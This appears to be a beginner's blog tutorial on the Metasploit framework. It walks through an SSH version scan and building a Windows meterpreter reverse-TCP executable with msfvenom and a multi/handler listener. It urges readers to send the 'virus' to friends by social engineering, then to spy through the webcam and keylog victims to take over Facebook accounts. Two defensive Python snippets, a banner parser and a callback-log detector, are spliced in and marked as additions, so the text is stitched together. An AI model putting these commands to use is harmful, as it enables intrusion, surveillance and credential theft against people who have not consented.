
In this article, we will talk about the Metasploit framework.

I am sure you have heard of Metasploit before, but maybe what it is and how to use it is still confusing. It is a framework, which means it is a collection of many pieces of software.

You can collect information, create malware, hack FTP, hack Android and many more things. You will find out by using it.

It is pre-installed in Kali or Parrot OS. There is a paid version and a free version.

Of course, Kali comes with the free version. You can also install it on Windows.

Nmap is also integrated into Metasploit; you can use Nmap in Metasploit without needing to open a new Terminal. In this post, I will explain how to use Metasploit and collect information about my server.

After that you will be able to understand the Metasploit commands used in other tutorials, and very soon be able to write your own tutorial.

What is an exploit with Metasploit?

In Metasploit, an exploit is the module that takes advantage of a weakness in the target. If you installed the reverse shell correctly on the target machine, you can explore the system with the help of the exploit. By default, 1590 exploits are available in Metasploit. I will also link to an article that explains how to add your own exploit to Metasploit.

Payload

The payload is a piece of code that helps to hack into the system, and the exploit helps you do whatever you want with the hacked machine. It helps you create a virus.

msfencode

According to Offensive Security, msfencode is another great little tool in the framework’s arsenal when it comes to exploit development. Most of the time, one cannot simply use the shellcode generated by msfpayload directly. It must be encoded for the target in order to work properly. This might mean turning your shellcode into pure alphanumeric characters, stripping out bad characters, or encoding it for a 64-bit target.

Important Network Vocabulary

LHOST: the attacker’s IP address.

LPORT: the port on the attacker’s machine you want to use.

RHOST: the victim machine’s IP address.

RPORT: the victim’s port number.

Ok, let’s start with Metasploit. I advise you, if you want to become a master, not to copy the commands, but to rewrite them.

Open Terminal and enter:

root@kali:~# service postgresql start

This starts the PostgreSQL database that Metasploit needs in order to run correctly.

Now enter:

root@kali:~# msfconsole

This will launch Metasploit. It may take a little time, as it contains a large number of exploits.

To view the different types of exploits:

msf > show exploits

This command will show all exploits. In front of each exploit, you will find a description and an example of how to use the exploit.

I’m going to retrieve information from the server of my website. To do this, you must use an ssh_version module. Enter:

msf > search ssh_version

As you can see, this shows all exploits related to SSH_version.

I will use ssh_version_15, and here are the commands for it (to use any exploit, just enter: use <exploit name>).

msf > use auxiliary/fuzzers/ssh/ssh_version_15

The next command is: show options.

As you can see, we need to set RHOST. As I said above, RHOST is the target IP address. We need to scan my website to get that IP address, and as I also told you above, Nmap is integrated into Metasploit. Here is the Nmap command for the scan.

root@kali:~# nmap -A opentechinfo.com -p 22 -vv

In the above command, -A is the hostname and -p is the port. There are about 65000 ports, and scanning all of them is very time consuming, but since SSH uses port 22 I specified that port directly to save time.

As you can see, my IP address is 104.27.170.122 and my port is filtered, which means it can be assumed to be closed. If the port is closed this won’t work, but I don’t have permission to attack another website, so I use this:

msf > set RHOST 104.27.170.122

Last step

If you now type: “run”, it will show you the OS.

As I told you above, my port is closed, so this won’t work. Don’t be sad, it will work on any other website that has port 22 open.
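What the ssh_version module reports comes from the SSH identification string (RFC 4253) that a server sends as soon as you connect. As an added example, not code from the original article or from Metasploit, here is a small Python parser for that string plus a helper for reading it from a server you administer; the sample banners are constructed, and a filtered or closed port simply yields no banner, which is why the run above shows nothing.

```python
import re
import socket

# RFC 4253 identification string: "SSH-protoversion-softwareversion [SP comments] CR LF"
BANNER_RE = re.compile(r"^SSH-(?P<proto>[0-9.]+)-(?P<software>\S+)(?: (?P<comments>.*))?$")


def parse_ssh_banner(line):
    """Parse one identification line; return a dict, or None if it is not an SSH banner."""
    m = BANNER_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    return {"proto": m.group("proto"), "software": m.group("software"),
            "comments": m.group("comments") or ""}


def grab_ssh_banner(host, port=22, timeout=5.0):
    """Read the identification line from your own server (needs network access).

    Returns (parsed_banner, error). A filtered or closed port gives (None, error):
    no banner is ever received, so there is nothing to report.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            data = sock.recv(256)
    except OSError as exc:
        return None, str(exc)
    # A server may send other lines before the banner; take the first SSH- line.
    for line in data.decode("ascii", "replace").splitlines():
        if line.startswith("SSH-"):
            return parse_ssh_banner(line), None
    return None, "no SSH identification line received"


# Constructed sample banners (not captured from any real host).
SAMPLE_BANNERS = [
    "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.6\r\n",
    "SSH-1.99-Cisco-1.25\r\n",
    "HTTP/1.1 400 Bad Request\r\n",
]

if __name__ == "__main__":
    for banner in SAMPLE_BANNERS:
        print(repr(banner.strip()), "->", parse_ssh_banner(banner))
```

The software field is exactly what an attacker reads off your server, so if it names a version you no longer want advertised, that is the signal to look at the server's banner settings.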

Now that you have the basic knowledge of Metasploit, let’s do something interesting with Metasploit. By this I mean creating a virus for Windows.

Hack Windows with Metasploit

Open a terminal and enter msfvenom. This will show you the usage information for creating a virus.

msfconsole will only load exploits, but msfvenom will load exploits with encodings. I hope you read the definition of payload earlier in the article.

OK, enter:

root@kali:~# msfvenom -p windows/meterpreter_reverse_tcp -f exe -a x86 --platform windows LHOST=192.168.174.192 LPORT=4444 -o santy.exe

Let me explain these arguments:
  • -p selects the payload.
  • -f exe indicates that the file type (the file extension) will be exe.
  • -a x86 indicates the system architecture. x86 is used for 32-bit systems; even though my system is 64-bit, a 32-bit program runs fine on a 64-bit system.
  • --platform windows indicates that this virus is for Windows.
  • LHOST and LPORT were already explained above. To find your LHOST, type ipconfig. Note that you must always use the IP address of the interface that is in use.
  • -o is the save path of the file, including its name. As I want to save it in the root folder, I only specify the name.

Note: enter these arguments in the order I entered them, if you reverse the position of the arguments, then Metasploit will not be able to create the virus.

Here is what you get if you enter this command correctly. The file will be saved in the current working directory.

The next command to enter:

msf > use multi/handler

Now you need to set the payload.

msf > set PAYLOAD windows/meterpreter/reverse_tcp

The payload should be the same one you used to create the malware.

Your LHOST is your IP address, you know how to enter it. If you don’t know your IP address, open a new tab by pressing shift+ctrl+T and enter ipconfig, this will show your local IP address.

In my case it’s 192.168.174.129; your IP should be in a similar format, but not identical.

msf > set LHOST 192.168.174.129

msf > set LPORT 4444

Last command

Type exploit or run. Both work the same way.

Now just send this virus to your friends. Use your social engineering skills.

In my case I use VMware, so I just copy and paste to my host machine running Windows 10.

When the victim launches this program, you will see that Metasploit and Meterpreter will open, as shown in the screenshot.
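From the defender’s side, that same moment shows up as a new outbound connection from the dropped executable to LHOST:LPORT. As an added example that is not part of the original tutorial, here is a small Python checker that runs over constructed endpoint network-connection log lines (a simplified CSV, not real Sysmon or EDR output) and flags connections to the handler port used above, as well as non-web connections made by executables running from user-writable folders:

```python
import csv
import io
import re

# Constructed endpoint network-connection log (simplified CSV, not real Sysmon/EDR output).
# Columns: timestamp,host,image,dest_ip,dest_port
SAMPLE_LOG = """\
2024-01-01T10:00:01,WIN10-PC,C:\\Windows\\System32\\svchost.exe,203.0.113.10,443
2024-01-01T10:00:05,WIN10-PC,C:\\Users\\bob\\Downloads\\santy.exe,192.168.174.129,4444
2024-01-01T10:00:09,WIN10-PC,C:\\Program Files\\Mozilla Firefox\\firefox.exe,198.51.100.7,443
2024-01-01T10:00:12,WIN10-PC,C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe,192.168.174.129,8080
"""

FIELDS = ["ts", "host", "image", "dst_ip", "dst_port"]
# LPORT used by the handler in this tutorial; extend with any ports your own hunts cover.
HANDLER_PORTS = {4444}
# Executables launched from these user-writable locations deserve a closer look.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(Downloads|Desktop|AppData\\Local\\Temp)\\", re.IGNORECASE)
# Ordinary browser traffic; anything else from such a location is reported.
WEB_PORTS = {80, 443}


def flag_callbacks(log_text):
    """Return one alert dict per suspicious connection, in log order."""
    alerts = []
    for row in csv.DictReader(io.StringIO(log_text), fieldnames=FIELDS):
        port = int(row["dst_port"])
        reasons = []
        if port in HANDLER_PORTS:
            reasons.append(f"destination port {port} matches a known handler LPORT")
        if USER_WRITABLE.search(row["image"]) and port not in WEB_PORTS:
            reasons.append("executable in user-writable folder made a non-web outbound connection")
        if reasons:
            alerts.append({"ts": row["ts"], "image": row["image"],
                           "dst": f"{row['dst_ip']}:{port}", "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in flag_callbacks(SAMPLE_LOG):
        print(alert["ts"], alert["image"], "->", alert["dst"])
        for reason in alert["reasons"]:
            print("   ", reason)
```

The second rule is the one that keeps working after an attacker changes LPORT, which is why the handler-port check alone is not enough.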

This means that you have successfully hacked into the victim machine. Here are some important operations that you can perform on the victim machine.

  • You can take photos from the webcam, or record live videos.
  • Record keystrokes (keylogger)
  • Download or Upload files to the victim machine.
  • Shut down or restart the computer.

Above are some examples, type “help” to find out what you can do on the victim computer, as well as how to do them.

To take a photo via the webcam, enter:

meterpreter > webcam_snap

To record keystrokes, enter “keyscan_start”; after a while, enter “keyscan_stop”, and to see what was typed, enter “keyscan_dump”. Keyloggers are a great way to hack a Facebook account.

As the help menu shows, you can also download or upload files, or view files from the victim machine.

OK, I hope you have learned some things from this article. Have fun !
